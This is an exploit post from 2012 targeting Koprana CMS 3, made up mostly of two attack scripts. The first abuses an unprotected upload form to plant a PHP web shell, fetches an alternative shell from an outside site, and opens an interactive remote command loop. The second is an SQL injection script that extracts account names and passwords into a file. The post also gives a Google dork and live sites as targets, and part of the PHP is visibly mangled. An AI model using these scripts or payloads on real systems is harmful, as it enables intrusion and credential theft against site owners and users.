facebook facebook twitter rss

Koprana CMS - Multiple Vulnerabilities

Author: The UnKnØwN , Published: 18-06-2012
====================== Vulnerability info ====================
[+] Exploit Title : Koprana CMS - Multiple Vulnerabilities
[+] Author : The UnKnØwN
[+] Software Link :http://www.mediafire.com/?ekz7a5px3ua3ebz
[+] Version : 3
[+] Category : Webapps
[+] Google Dork : allintext:Template & Design by Nicow - Php & Code by Nicow
[+] Tested on : Windows xp
[+] Demo site : - http://innodrive.redheberg.com/
- http://elink-games.net
- http://serveur-renouveau.fr/site/
============================ Greets ==========================
Greets to : Soka - Hony - ColdFire - kimgx12 - w0dm4n - MOOH Splinter -
The Crazy3D Team and all Algerian h4x0rs
www.izzi-hack.com - www.dofus-exploit.com
===================== Vulnerability details ==================
1) Unprotected upload form in buy1_ontrue.php allows remote upload
2) unprotected post in vip_ontrue.php allow sql injection
$personnage = $_POST['perso'];
$sql = "SELECT * FROM personnages WHERE guid = $personnage";
=========================== Exploit ==========================
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
//       - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/* 
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit

!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode 
 */
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout"5);

function 
http_send($host$port,$packet)
{
    if (!(
$sock fsockopen($host$port)))
        die(
"\n[-] No response from {$host}:{$port}\n");
 
    
fputs($sock$packet);
    return 
stream_get_contents($sock);
}

print 
"\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print 
"\n| Koprana CMS Remote Upload Exploit                                   |";
print 
"\n|                                by The UnKn0wN                       |";
print 
"\n|     Greets to : The Crazy3D members and all Algerian h4x0rs         |";
print 
"\n+---------------------------------------------------------------------+";
print 
"\n|           www.Dofus-Exploit.com | WwW.IzzI-Hack.com                 |";
print 
"\n+---------------------------------------------------------------------+\n";

if (
$argc 3)
{
    print 
"\nUsage......: php $argv[0] <host> <path> <mode>\n";
    print 
"\nExample....: php $argv[0] localhost / 1";
    print 
"\nExample....: php $argv[0] localhost /site/ 2\n";
    die();
}

$host $argv[1];
$port $argv[2];
$path $argv[3];
$mode $argv[4];

$shell "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$shell2 file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)

if($mode == "2"$shell $shell2;

$boundary "---------".str_replace("."""microtime());
$payload  "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= "".$shell."\n\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n";
$payload .= "--{$boundary}--\r\n";

$packet  "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";

http_send($host,$port$packet);
if(
$mode == "1") {

$packet  "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (!(
$sock http_send($host,$port$packet))) die("\n[-] Upload failed!\n");
print 
"[+]Backdoor was upload!\n[+]Getting the shell...\n"
while(
1)
{
    print 
"\nBHR@{$host}# ";
    if ((
$cmd trim(fgets(STDIN))) == "exit") break;
    
preg_match("/_code_(.*)/s"http_send($host,$portsprintf($packetbase64_encode($cmd))), $m) ?
    print 
$m[1] : die("\n[-] Exploit failed!\n");
}
}else
    print 
"Go to {$host}{$path}sh.php to check.\n";

?>



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2) SQLI
(Exploit koprana_injection.php in attachments)
page : http://site/path/index.php?pages=vip_validation
post data : send=Envoyer&perso={inject}

load exploits/webapp/omiworld_injection.php
set HOST target
set MODE (1 for admin accounts/2 for all accounts)
set FILE (save format TXT/SQL)
exploit
============================= END =============================
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
// - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
load exploits/webapp/omiworld_injection.php
set HOST target
set MODE (1 for admin accounts/2 for all accounts)
set FILE (save format TXT/SQL)
exploit


!Koprana_Injection
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Injection mode
@ FILE = sql = Save type
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host,$port, $packet)
{
if (!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}:{$port}\n");

fputs($sock, $packet);
return stream_get_contents($sock);
}
function write_txt($host, $file, $account, $pass, $level)
{
$save_file = fopen("".$file."", "a+");
fwrite($save_file, "$account:$pass:$level\n");
fclose($save_file);
}
function write_sql($file, $account, $pass, $level)
{
$save_file = fopen("".$file."", "a+");
fwrite($save_file, "INSERT INTO 'account_inj' VALUES ('$account', '$pass', '$level')\n");
fclose($save_file);
}
function write($host, $file)
{
$save_file = fopen("".$file."", "a+");
if($file == "accounts.sql")
fwrite($save_file, "/* Accounts of $host */\n");
else
fwrite($save_file, "=========== Accounts of $host ===========\n");
fclose($save_file);
}
function fetch_data($page)
{
$debut = "~'";
$debutTxt = strpos( $page, $debut ) + strlen( $debut );
$fin = "'~1";
$finTxt = strpos( $page, $fin );
$data_fetch = substr($page, $debutTxt, $finTxt - $debutTxt );
return $data_fetch;
}
function PostIt($host,$port,$path,$payload){
$packet = "POST {$path}index.php?pages=vip_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";
return http_send($host,$port, $packet);
}
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Koprana CMS SQL Injection Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <port> <path> <mode> <save>\n";
print "\nExample....: php $argv[0] localhost 80 / 1 txt ";
print "\nExample....: php $argv[0] localhost 80 /site/ 3 sql \n";
die();
}

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];
$file = $argv[5];

if($file == "txt") $file = "accounts.txt";
else $file = "accounts.sql";
$inj_test = "or '1'='1";
$inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_test."";

if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload)))) die ("[-] CMS not vulnerable\n");
else print ("[+] CMS can be exploited!\n");
$payload = "send=Envoyer&perso=test".$inj_db."";
$db = fetch_data(PostIt($host,$port,$path,$payload));
if(empty($db)) die("[-] Can't find the database!\n");
print "[+] Database: ".$db."\n";
switch ($mode)
{
case 1:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Admin accounts: ".$num."\n";
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));

list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";

if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
case 2:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Accounts: ".$num."\n";
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));

list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";

if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
}

Like us on Facebook :